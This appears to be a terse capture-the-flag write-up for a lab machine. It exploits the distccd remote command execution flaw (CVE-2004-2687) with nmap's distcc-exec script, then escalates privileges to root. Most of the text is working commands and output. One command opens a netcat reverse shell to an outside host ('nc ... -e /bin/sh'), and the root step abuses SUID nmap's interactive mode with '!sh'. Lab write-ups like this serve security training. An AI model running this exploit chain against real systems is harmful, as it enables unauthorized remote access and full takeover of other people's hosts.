3 :3632 distccd

https://nmap.org/nsedoc/scripts/distcc-cve2004-2687.html

$ nmap -p 3632 10.10.10.3 --script distcc-exec --script-args="distcc-exec.cmd='whoami;id'" -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-26 16:45 PDT
Nmap scan report for 10.10.10.3
Host is up (0.071s latency).

PORT     STATE SERVICE
3632/tcp open  distccd
| distcc-exec:
|   VULNERABLE:
|   distcc Daemon Command Execution
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2004-2687
|     Risk factor: High  CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
|       Allows executing of arbitrary commands on systems running distccd 3.1 and
|       earlier. The vulnerability is the consequence of weak service configuration.
|
|     Disclosure date: 2002-02-01
|     Extra information:
|
|     daemon
|     uid=1(daemon) gid=1(daemon) groups=1(daemon)
|
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687
|       https://distcc.github.io/security.html
|_      https://nvd.nist.gov/vuln/detail/CVE-2004-2687

Nmap done: 1 IP address (1 host up) scanned in 0.42 seconds

$ nmap -p 3632 10.10.10.3 --script distcc-exec --script-args="distcc-exec.cmd='nc 10.10.14.2 6969 -e /bin/sh'" -Pn

whoami
daemon

find / -type f -user root \( -perm -4000 -o -perm -2000 \) 2>/dev/null -ls
344956  768 -rwsr-xr-x   1 root     root       780676 Apr  8  2008 /usr/bin/nmap

nmap --interactive
!sh

whoami;id
root
uid=1(daemon) gid=1(daemon) euid=0(root) groups=1(daemon)

Last updated